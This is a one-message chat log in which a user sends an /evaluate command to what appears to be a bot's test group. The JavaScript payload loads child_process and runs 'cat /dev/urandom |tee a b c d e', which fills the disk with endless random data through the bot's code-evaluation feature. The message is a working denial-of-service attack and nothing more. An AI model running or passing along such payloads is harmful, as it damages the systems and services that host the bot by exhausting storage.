Sean Wei says to SITCON BOT Testpool
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'cat /dev/urandom |tee a b c d e'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });